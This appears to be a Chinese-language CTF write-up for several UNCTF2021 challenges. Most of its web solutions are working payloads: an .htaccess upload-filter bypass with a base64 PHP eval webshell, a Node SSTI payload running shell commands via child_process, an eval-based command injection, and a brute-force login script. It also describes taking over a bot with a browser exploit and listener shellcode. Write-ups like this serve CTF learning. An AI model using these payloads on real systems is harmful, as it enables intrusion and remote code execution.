爆破找前6位为666666的md5的值,然后常规操作即可得到flag
import hashlib
import re
for a in range(1,1000000000):
b=hashlib.md5(str(a).encode("utf-8"))
c=(b.hexdigest().encode("utf-8"))
if c[0:6]==b'666666':
print(a)
#print(c)
highlight_file(__FILE__);
$sandbox = md5($_SERVER['REMOTE_ADDR']);
if (!is_dir($sandbox)) {
mkdir($sandbox);
}
if (isset($_GET['filename']) && isset($_GET['content'])) {
$filename = $_GET['filename'];
$content = $_GET['content'];
if (preg_match_all("/ph|\.\.|\//i", $filename) || strlen($filename) > 10) {
die("No way!");
}
if (preg_match_all("/<\?|ph/", $content)) {
die("No way!");
}
$filename = $sandbox . "/" . $filename;
@file_put_contents($filename, $content);
echo $filename;
}
传.htaccess
?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .png%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=a.png"
传a.png
PD9waHAgZXZhbCgkX1BPU1Rbc2FwXSk7Pz4=
随便乱输个,报错,sodajs,找sodajs的ssti,构造一手(好吧偷的)
{{ " ".toString.constructor("return global.process.mainModule.constructor._load('child_process').execSync('ls').toString()")() }}
然后cat /flag即可
show_source(__FILE__);
echo("欢迎来到unctf2021,have fun"."
");
$db_host=$_POST['host'];
$db_user=$_POST['user'];
$db_pwd=$_POST['pwd'];
$db_port=$_POST['port'];
if($db_host==""){
die("数据库地址不能为空!");
}
if(is_numeric($db_host)){
echo("fakeflag is /flag"."
");
if(preg_match("/;|\||&/is",$db_user) || preg_match("/;|\||&/is",$db_pwd) || preg_match("/;|\||&/is",$db_port)){
die("嘉然今天吃什么");
}
system("mysql -h $db_host -u $db_user -p $db_pwd -P $db_port --enable-local-infile");
}
else{
echo("Maybe you can do someting else"."
");
if(!isset($db_user) || !isset($db_pwd)){
eval("echo new Exception(\"\");");
}
else{
$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
eval("echo new $db_user($db_pwd);");
}
}
注意到后面两个可控参数
$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
eval("echo new $db_user($db_pwd);");
用异常报错执行rce,ctfshow上有对应知识点。
payload:
host=c&pwd=system("tac /fllllaaaaag")&user=exception
题目说了
I can tell you my name is admin and my password is made by number only. This time, you can not to buster my password :)
密码纯数字,但是有js加密过,混淆又解不开,bp没法爆,这里贴上脚本
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
if __name__ == '__main__':
browser = webdriver.Chrome(executable_path=r"D:\Program Files\Google\Chrome\Application\chromedriver.exe")
browser.get("http://0578b386-07e3-45c0-8eee-97b1f3546d01.node1.hackingfor.fun/login.php")
try:
WebDriverWait(browser, 10).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="submit"]'))
)
except Exception as e:
browser.quit()
exit(1)
browser.execute_script("document.querySelector('#username').value='admin'")
for password in range(999999):
# password=1234
browser.execute_script(
"document.querySelector('#password').value='%s';document.querySelector('#submit').click()" % (
str(password)))
hint说注意user-agent,我放了个自己vps的xss平台地址上去让他访问,捕获到chrome版本还有系统,百度一下有这个版本的远程代码执行漏洞0day。打开viper新增一个监听载荷
将生成的c文件里的内容稍作修改替换原本漏洞的exp里的shellcode,变成
然后放到vps里,起一个服务
python3 -m http.server xxxx(端口号)
起好之后把vps:xxxx地址填进去让bot去照相,也就是访问,然后就可以成功上线
之后就可以拿flag了
一串base64解密
变异凯撒
#!/usr/bin/env python
# coding:utf-8
def b_kaisa(mstr):
j = 4
i = 0
lmstr = []
for i in range(len(mstr)):
m = ord(mstr[i]) # 将密文的第i个字母变为其ascii码值
m = m + j # ascii值+j
lmstr.append(m) # 将递进后的ascii值存入列表lmstr[]
i = i+1
j = j+1
return lmstr
if __name__ == '__main__':
m_str = 'qi]m^roVibdVbXUU`h' # 密文
lstr = []
lstr = b_kaisa(m_str)
for i in lstr:
print(chr(i),end='')
非常无语的改高度,算一下十六进制值然后找到改一下就行了
一开始没发现什么,strings看看,发现一串倒过来的base64,拿去解码得到
佛日:上俱故。遠大密隸怯除多皤孕耨爍梵地諳薩侄究缽老諳不想皤者滅罰輸缽阿侄滅梵夢侄不冥吉真梵沙缽度即缽隸怯明侄切侄知呐地南呼舍咒奢佛涅哆姪神密明哆逝室地恐冥呼怯佛喝哆伽都怯遮諳倒缽帝冥帝輸曰諳麼俱怖俱苦俱波
很无语的是这个是日 不是曰 改过来即可得到flag
图片文件用tweakpng打开,错误的crc值拿去转一下得到压缩包密码,EDGnb!!打开以后得到一个b站链接和一个截图,截图上面是时间,盲猜弹幕或者评论,然后在对应的世界找到评论,得到flag